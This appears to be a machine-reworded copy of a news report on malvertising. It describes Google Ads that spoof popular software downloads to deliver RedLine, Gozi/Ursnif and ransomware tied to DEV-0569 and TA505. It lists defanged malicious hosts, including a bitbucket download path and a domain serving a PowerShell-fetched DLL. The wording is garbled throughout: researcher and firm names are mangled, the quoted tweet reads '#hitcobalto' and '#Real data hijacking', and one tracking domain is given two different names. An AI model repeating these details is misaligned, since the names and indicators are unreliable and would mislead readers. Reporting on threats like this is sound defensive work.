A tracked threat actor such as DEV-0569 uses Google Ads in ongoing and widespread advertising campaigns to distribute malware, steal victims’ passwords, and ultimately breach networks for ransomware attacks.
In the past two weeks, cybersecurity researchers MalwareHunterTeam, German FernandezY Dormann have illustrated how Google search results have become a hotbed of malicious ads that push malware.
These ads pretend to be websites of popular software programs, such as LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR, and VLC.
Source: Researchers/BleepingComputer
By clicking on the ads, visitors are taken to sites that appear as download portals or mirrors of legitimate software sites, as shown below.
Source: Bleeping Computer
However, when you click on the download links, it usually downloads an MSI file that installs various malware depending on the campaign.
The list of malware installed in these campaigns so far includes RedLine Stealer, Gozi/Ursnif, Vidar, and potentially Cobalt Strike and ransomware.
While there appear to be many threat actors abusing the Google Ads platform to distribute malware, two campaigns in particular stand out, as their infrastructure has previously been associated with ransomware attacks.
From Google ads to ransomware attacks
In February 2022, uncovered principal a malware distribution campaign that uses SEO poisoning to rank sites claiming to be popular software in search results.
If a user were to install the software offered on these pages, it would launch a new malware downloader called BatLoader, which initiates a multi-stage infection process that ultimately gives attackers initial access to victims’ networks.
Later that year, Microsoft reported that the threat actors behind BatLoader, tracked as DEV-0569, had begun using Google ads to promote their malicious sites. Worse yet, Microsoft said that these infections ultimately led to the deployment of real ransomware in breached networks.
“Recent activity of the threat actor Microsoft tracks as DEV-0569, known for distributing various payloads, has led to the deployment of Royal ransomware, which first emerged in September 2022 and is being distributed by multiple threat actors” . Microsoft warned in your report.
Researchers believe that DEV-0569 is an initial access broker that uses its malware distribution system to breach corporate networks. They use this access in their own attacks or sell it to other malicious actors, such as the Royal ransomware gang.
While Microsoft did not share many URLs related to these attacks, other reports from elFIR Y eSentire added more information, including the following URLs used in BatLoader campaigns:
bitbucket[.]org/ganhack123/load/downloads
ads-check[.]com (Used for tracking Google ads statistics)
Fast forward to January 21, 2023, when the CronUp researcher German Fernandez noted that recent Google ads promoting popular software led to malicious sites using infrastructure operated by threat actors DEV-0569.
1/ DEV-0569, current distribution via #GoogleAds.
one.- #gozi alias #Ursnif (bot)
2.- #Red line (thief)
And if the conditions are right, perhaps:
3.- #hitcobalto (C2)
four.- #Real data hijacking(No more BatLoader in the infection chain) pic.twitter.com/mYp8hSU7FH
— German Fernandez (@1ZRR4H) January 21, 2023
While the malicious installers in this campaign no longer use BatLoader, like previous campaigns seen by Microsoft, they install an information stealer (RedLine Stealer) and then a malware downloader (Gozi/Ursnif).
In the current campaign, RedLine is used to steal data such as passwords, cookies, and cryptocurrency wallets, while Gozi/Ursnif is used to download more malware.
Fernández told BleepingComputer that he linked these new campaigns to DEV-0569 since they were using the same bitbucket repository and the ad verification[.]com URL used in reported campaigns for November/December 2022.
Fernández did not wait long enough to see if Cobalt Strike and Royal Ransomware would be installed. However, he told BleepingComputer that he believed the hackers would eventually use the Gozi infection to launch Cobalt Strike like BatLoader did in previous campaigns.
Fernández also accessed the DEV-0569 web panel used to track his malware distribution campaign and shared screenshots On twitter. These screenshots showed the legitimate programs being spoofed and the many victims around the world who were getting infected on a daily basis.
When asked how many people were infected by this campaign based on web dashboard statistics, he said that it was only possible to estimate the number.
“The data from the panel is cleaned every day of the campaign, but there is one piece of information that could give us an idea, it is the correlative ID of the records (it could be an estimated value for the number of victims of this panel, in this case the latest value today is 63576),” Fernandez told BleepingComputer.
Another campaign linked to CLOP ransomware
to make things worse Fernandez discovered that a different but similar Google ad campaign was using infrastructure previously used by a threat group tracked as TA505, known for distributing CLOP ransomware.
In this Google ad campaign, threat actors distribute malware via websites pretending to be popular software, including AnyDesk, Slack, Microsoft Teams, TeamViewer, LibreOffice, Adobe, and strangely, websites for IRS W-9 forms .
A list of domains in this campaign tracked by CronUp is available at this github page.
When the malware from this campaign is installed, it will run a PowerShell script that downloads and runs a DLL from the website. download cdn[.]comwhich TA505 used previously.
Source: Bleeping Computer
However, Proofpoint threat researcher tommy madjar told BleepingComputer that this domain had changed ownership in the past and it’s unclear if TA505 is still using it.
Regardless of who owns these domains, the sheer number of malicious Google ads showing up in search results is becoming a huge problem for both consumers and businesses.
With these campaigns being used to gain initial access to corporate networks, they can trigger various attacks such as data theft, ransomware, and even destructive attacks to disrupt a company’s operations.
While BleepingComputer did not contact Google regarding this article, we did contact them last week regarding a similar malware campaign distributed through Google ads.
Google told us at the time that the platform’s policies are designed and enforced to prevent brand spoofing.
“We have strong policies that prohibit ads that try to bypass our app disguising the identity of the advertiser and posing as other brands, and we vigorously enforce them. We reviewed the ads in question and removed them,” Google told BleepingComputer.
The good news is that Google has been removing ads as they are reported and detected.
The bad news is that threat creators are constantly launching new ad campaigns and new sites, making it one gigantic game of hit a mole, and it doesn’t look like Google is winning.
